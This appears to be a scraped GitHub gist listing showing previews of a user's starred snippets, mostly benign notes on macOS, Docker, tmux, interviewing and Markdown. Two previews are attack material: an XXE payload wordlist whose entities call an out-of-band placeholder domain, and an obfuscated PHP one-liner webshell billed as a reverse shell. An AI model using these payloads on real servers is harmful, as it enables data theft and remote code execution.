Skip to content

Instantly share code, notes, and snippets.

View duraki's full-sized avatar

duraki

170 followers · 924 following
View GitHub Profile
@kconner
kconner / macOS Internals.md
Last active April 22, 2024 21:28
macOS Internals

macOS Internals

Understand your Mac and iPhone more deeply by tracing the evolution of Mac OS X from prelease to Swift. John Siracusa delivers the details.

Starting Points

How to use this gist

You've got two main options:

@honoki
honoki / xxe-payloads.txt
Last active March 27, 2024 18:49
XXE bruteforce wordlist including local DTD payloads from https://github.com/GoSecure/dtd-finder
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x SYSTEM "http://xxe-doctype-system.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x PUBLIC "" "http://xxe-doctype-public.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe SYSTEM "http://xxe-entity-system.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe PUBLIC "" "http://xxe-entity-public.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe SYSTEM "http://xxe-paramentity-system.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe PUBLIC "" "http://xxe-paramentity-public.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xxe-xsi-schemalocation.y
@terjanq
terjanq / rev_shell.php
Last active January 30, 2024 21:53
The shortest non-alphanumeric reverse shell script (19 bytes)
<?=`{${~"\xa0\xb8\xba\xab"}["\xa0"]}`;
/*
* In terminal:
* $ echo -ne '<?=`{${~\xa0\xb8\xba\xab}[\xa0]}`;' > rev_shell.php
* This is how the code will be produced, \xa0\xb8\xba\xab will be
* treated as constant therefore no " needed. It is also not copyable
* string because of non-ascii characters
*
* Explanation:
@fattredd
fattredd / GPMplaylistDL.py
Last active May 18, 2020 23:46
#!/usr/bin/python
# -*- coding: utf-8 -*-
'''
This is a little script to download every song from every playlist
if your Google Play Music account. Songs are organized as follows:
<playlist>/<artist>/<album>/<song>.mp3
I Highly recomend putting this file in your %USER%\Music folder
before running.
@vcarl
vcarl / questions-for-your-interviewer.md
Last active February 19, 2024 17:02

I bundled these up into groups and wrote some thoughts about why I ask them!

If these helped you, I'd love to hear about it!! I'm on twitter @vcarl_ or send me an email carl.vitullo@gmail.com

Onboarding and the workplace

https://blog.vcarl.com/interview-questions-onboarding-workplace/

  • How long will it take to deploy my first change? To become productive? To understand the codebase?
  • What kind of equipment will I be provided? Will the company pay/reimburse me if I want something specific?
@widdowquinn
widdowquinn / kali_osx_persistence_wifi.md
Last active January 28, 2024 06:32
Kali Linux Live USB with persistence and wireless on Macbook Pro

Kali Linux Bootable USB with Persistence and Wireless on OSX

Download the appropriate Kali Linux .iso

I used a 64 bit .iso image, downloaded via HTTP. I downloaded the amd64 weekly version, as the pool linux headers (needed below for installation of wireless drivers) were ahead of the stable release kernel.

Download the SHA256SUMS and SHA256SUMS.gpg files from the same location.

@FranklinYu
FranklinYu / README.markdown
Last active April 20, 2024 17:08
links for old versions of Docker for Mac (inspired by docker/for-mac#1120)

links for old versions of Docker for Mac

Deprecated

Docker provides download links in release note. They promised that

(we) will also include download links in release notes for future releases.

Note:

@carnal0wnage
carnal0wnage / gist:606c41ac6ec40bf5c69d4db96d9312e3
Created April 28, 2017 16:07
Red Team Books
From: http://redteams.net/bookshelf/
Techie
Unauthorised Access: Physical Penetration Testing For IT Security Teams by Wil Allsopp.
Social Engineering: The Art of Human Hacking by Christopher Hadnagy
Practical Lock Picking: A Physical Penetration Tester's Training Guide by Deviant Ollam
The Art of Deception: Controlling the Human Element of Security by Kevin Mitnick
Hacking: The Art of Exploitation by Jon Erickson and Hacking Exposed by Stuart McClure and others.
Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning by Fyodor
The Shellcoder's Handbook: Discovering and Exploiting Security Holes by several authors
@DavidWells
DavidWells / aligning-images.md
Last active April 25, 2024 10:57
Guide to aligning images in github readme.md files. https://davidwells.io/snippets/how-to-align-images-in-markdown

Aligning images

This is a guide for aligning images.

See the full Advanced Markdown doc for more tips and tricks

left alignment

@cdkamat
cdkamat / install-tmux
Last active March 17, 2023 01:03 — forked from rothgar/install-tmux
Install tmux 2.3 on rhel/centos 6
# Install tmux on Centos release 6.5
# install deps
yum install gcc kernel-devel make ncurses-devel
# DOWNLOAD SOURCES FOR LIBEVENT AND MAKE AND INSTALL
curl -OL https://github.com/libevent/libevent/releases/download/release-2.0.22-stable/libevent-2.0.22-stable.tar.gz
tar -xf libevent-2.0.22-stable.tar.gz
cd libevent-2.0.22-stable
./configure --prefix=/usr/local